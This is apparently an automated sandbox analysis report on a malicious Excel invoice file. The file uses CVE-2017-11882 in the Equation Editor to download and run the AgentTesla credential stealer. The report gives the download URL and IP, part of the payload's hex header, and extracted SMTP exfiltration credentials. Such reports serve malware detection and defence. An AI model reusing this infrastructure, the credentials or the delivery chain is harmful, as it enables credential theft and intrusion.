Loading ...

Play interactive tourEdit tour

Windows Analysis Report FACTURA 3879843.xlsx

Overview

General Information

Sample Name:FACTURA 3879843.xlsx
Analysis ID:452698
MD5:9ae3b1aa2c80f4e12e33569d7b5839df
SHA1:8579f018a10f93cedbb73369fb8c7b66416d9846
SHA256:82737660638921bf4d3e82bf4c059ec3cb0b61bd988365572bd4207b87ceb060
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AgentTesla
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2656 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 260 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3068 cmdline: 'C:\Users\Public\vbc.exe' MD5: E8194372570D57749B3033E063BDC5D8)
      • vbc.exe (PID: 1772 cmdline: C:\Users\Public\vbc.exe MD5: E8194372570D57749B3033E063BDC5D8)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "katie.fox@snythomer.com", "Password": "wirelord3116", "Host": "us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        Process Memory Space: vbc.exe PID: 1772JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: vbc.exe PID: 1772JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              7.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security

                Sigma Overview

                Exploits:

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.91.148, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 260, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                Sigma detected: File Dropped By EQNEDT32EXEShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 260, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exe

                System Summary:

                barindex
                Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 260, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3068
                Sigma detected: Execution from Suspicious FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 260, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3068

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 7.2.vbc.exe.400000.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "katie.fox@snythomer.com", "Password": "wirelord3116", "Host": "us2.smtp.mailhostbox.com"}
                Multi AV Scanner detection for domain / URLShow sources
                Source: http://198.12.91.148/oso.exeVirustotal: Detection: 8%Perma Link
                Multi AV Scanner detection for submitted fileShow sources
                Source: FACTURA 3879843.xlsxVirustotal: Detection: 30%Perma Link
                Source: FACTURA 3879843.xlsxReversingLabs: Detection: 28%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exeJoe Sandbox ML: detected
                Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected

                Exploits:

                barindex
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.12.91.148:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.12.91.148:80
                Source: excel.exeMemory has grown: Private usage: 4MB later: 75MB
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 16:18:32 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Thu, 22 Jul 2021 07:24:36 GMTETag: "f9800-5c7b12de621e5"Accept-Ranges: bytesContent-Length: 1021952Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 1d f9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 32 0c 00 00 62 03 00 00 00 00 00 2e 51 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 10 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 50 0c 00 4b 00 00 00 00 80 0c 00 e8 5d 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 31 0c 00 00 20 00 00 00 32 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 18 00 00 00 00 60 0c 00 00 02 00 00 00 36 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5d 03 00 00 80 0c 00 00 5e 03 00 00 38 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0f 00 00 02 00 00 00 96 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: global trafficHTTP traffic detected: GET /oso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.148Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.91.148
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A2F8885.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /oso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.148Connection: Keep-Alive
                Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: vbc.exe, vbc.exe, 00000007.00000002.2364130340.0000000000EC2000.00000020.00020000.sdmp, oso[1].exe.4.drString found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
                Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://pcLwYQ.com
                Source: vbc.exe, 00000007.00000002.2365402935.0000000005E10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: vbc.exe, vbc.exe, 00000007.00000002.2364130340.0000000000EC2000.00000020.00020000.sdmp, oso[1].exe.4.drString found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
                Source: vbc.exe, 00000007.00000002.2365402935.0000000005E10000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: 69CBECC2.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
                Source: vbc.exe, 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                System Summary:

                barindex
                Office equation editor drops PE fileShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeCode function: 7_2_003265D0
                Source: C:\Users\Public\vbc.exeCode function: 7_2_00325F48
                Source: C:\Users\Public\vbc.exeCode function: 7_2_00322099
                Source: C:\Users\Public\vbc.exeCode function: 7_2_00326480
                Source: C:\Users\Public\vbc.exeCode function: 7_2_00325678
                Source: C:\Users\Public\vbc.exeCode function: 7_2_00EC7846
                Source: FACTURA 3879843.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: oso[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: oso[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: oso[1].exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csCryptographic APIs: 'CreateDecryptor'
                Source: vbc.exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.0.vbc.exe.ec0000.0.unpack, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@6/13@0/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$FACTURA 3879843.xlsxJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE964.tmpJump to behavior
                Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: FACTURA 3879843.xlsxVirustotal: Detection: 30%
                Source: FACTURA 3879843.xlsxReversingLabs: Detection: 28%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: FACTURA 3879843.xlsxStatic file information: File size 1227776 > 1048576
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: FACTURA 3879843.xlsxInitial sample: OLE indicators vbamacros = False
                Source: FACTURA 3879843.xlsxInitial sample: OLE indicators encrypted = True
                Source: initial sampleStatic PE information: section name: .text entropy: 7.56201911233
                Source: initial sampleStatic PE information: section name: .text entropy: 7.56201911233
                Source: oso[1].exe.4.dr, XC8LQ7SRtLdGVTj875/RSm6LshekR3eiKnl2d.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'BCpK0qHUG6', 'AbOK6vXIcg', 'QoJKB4Rw0e', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'OZ4KTFK59K'
                Source: oso[1].exe.4.dr, gpprQs1JTfKY43huFu/FX6iCHA7LM8aIR8xSD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'AinK8bq2yu', 'zUKmlCri3a', 'Bgpmwss4W8', 'HmjmupSYqs', 'c59mOLHwKl', 'H4gmVXsG3m', 'CkpmbC96WM', 'oNam6TVq6p'
                Source: oso[1].exe.4.dr, XPEfFa5V3Es49PEcfY5/bNPoP65oL7XjgIt7X4l.csHigh entropy of concatenated method names: '.ctor', 'q8tcf8mQYy', 'KENcDogZaD', 'oUFcvURfc4', 'J2WcFbEkWn', 'CuUc0wmapc', 'xFScxAenFI', 'z49c70yUiS', 'iMCcbUOx4l', 'ueTczCI0Om'
                Source: oso[1].exe.4.dr, yyI5uhmlZql1NXDJdB/ijoMm5rxdPnqdfLa2F.csHigh entropy of concatenated method names: 'NJYoeUuyln', 'sdQo9JjuCk', 'mQqoGYusu5', 'a6towU9NfQ', 'j96oB2V5CW', 'zrho2ehmSP', 'igIo4t7X4l', 'Hfhoqn1LKo', 'XPEotfFa3E', 'nyEolE546H'
                Source: oso[1].exe.4.dr, sIiWtTsZOy3ymXKnDM/JLLJRtUXaCaWrPg6HW.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'h9kdMWng5s', 'lhkQNO1OVB', 'DWdQLT5a9Q', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'We5vvBDwjk'
                Source: oso[1].exe.4.dr, Qu6SICHw3A4mPVjAWP/jhR0vSPbuV7axYFEin.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'eDnd8BQBBZ', 'oejdQlRVXK', 'jlmdjD3r74', 't3fdX1CHfH', 'iFAd4uSimN', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU'
                Source: oso[1].exe.4.dr, Nn8lq6qXoiQOmnkFjd/ph3i2r2ZpugBVdcTRF.csHigh entropy of concatenated method names: 'RJT5rfKY43', 'LuF5musSm6', 'dnl532d7C8', 'tQ75CRtLdG', 'BUo5utwtL1', 'lX05RxfpiJ', 'awt5Ifl0qc', 'KQx5EEfLDu', 'c7a5JxYFEi', 'pHu5A6SICw'
                Source: oso[1].exe.4.dr, YlSuYQRHSxRhPJwg0s/EL5ZuhuBsUedVLCe47.csHigh entropy of concatenated method names: 's8qVZbC8tq', 'WgyVJmgmfp', 'ed6V1VSdb8', 'mvtVhM7Zba', 'uWmVN7gS2R', 'Fq2VpoJp8p', 'PcpVPa6D4N', 'dClVHbN2io', 'cMOVskAh69', 'ckYVfZmUOk'
                Source: oso[1].exe.4.dr, Jawtflp0qcAQxEfLDu/mRmUotNwtL1tX0xfpi.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'Y3vOvekntU', 'uURvT8k6iY', 'UqDvzkHbQZ', 'jEkQg7jO4O', 'ICAQer9Nm0', 'af9QyZ0r7u', 'FqpQ06hfRQ', 'CQTQYL6yeT'
                Source: oso[1].exe.4.dr, q1IUAUDwsWbplMEoQF/HsN3gxfes6Rv157qSv.csHigh entropy of concatenated method names: '.ctor', 'Tnhc5Ut6V9', 'O0ocoWEmfr', 'loCcVYeBVS', 'kj4cKMhw1w', 'ejqcOV6i0e', 'pvrcdUqJfo', 'SY6dRvIzG297TILfElI', 'jLhcHH1o0iKvI3qO4OA', 'pORp8VIiNhnGUL8R3XA'
                Source: oso[1].exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csHigh entropy of concatenated method names: 'E62cmi1mr2', 'zk6cu701cO', 'hkfcRu6tGh', '.ctor', '.ctor', 'YHZcYLZHOd', 'tsXc3aHNDv', 'OffcCVf2R9', 'owMcMYdHmV', 'WEQahG1D4mkQl6JHEL2'
                Source: oso[1].exe.4.dr, YAE3O3JXw2wpfdXcfJ/LlJn3uZpU8RWafXNOV.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'EEhmpNBWOF', 'mQfm2X2uUR', 'lTWmZeuBxU', 'B6SmWTrawQ', 'muEmPau0s8', 'DJJmnK1SHX', 'RnEmsb7cLj', 'GtPmaaH5iO'
                Source: oso[1].exe.4.dr, obWUh6Cb9BqRvavWXw/lOTTtm3pgdvAnULHLr.csHigh entropy of concatenated method names: 'w1xVgN0Jsy', 'dKmVWLdg6f', 'LCdV6EPlXj', 'ciXVnI2Mdm', 'EfBVe3gYLM', 'dCtV9Exve3', 'MGqVLVJrk9', 'WYaVGTgx9V', 'GtiVwhnFLW', 'dlFVT6RCdy'
                Source: oso[1].exe.4.dr, Toc3gZ55Ds3ykoTkkT4/A0PiG55aXVGg1GhxwAg.csHigh entropy of concatenated method names: 'Dispose', 'Es2cSPvwhn', 'IoHcNfRLkU', 'GrgcpiH89b', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'aJtoyu1dUBYUqHoSHQY', 'kGjBTe1Yfd5fFFj0Hle'
                Source: vbc.exe.4.dr, XC8LQ7SRtLdGVTj875/RSm6LshekR3eiKnl2d.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'BCpK0qHUG6', 'AbOK6vXIcg', 'QoJKB4Rw0e', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'OZ4KTFK59K'
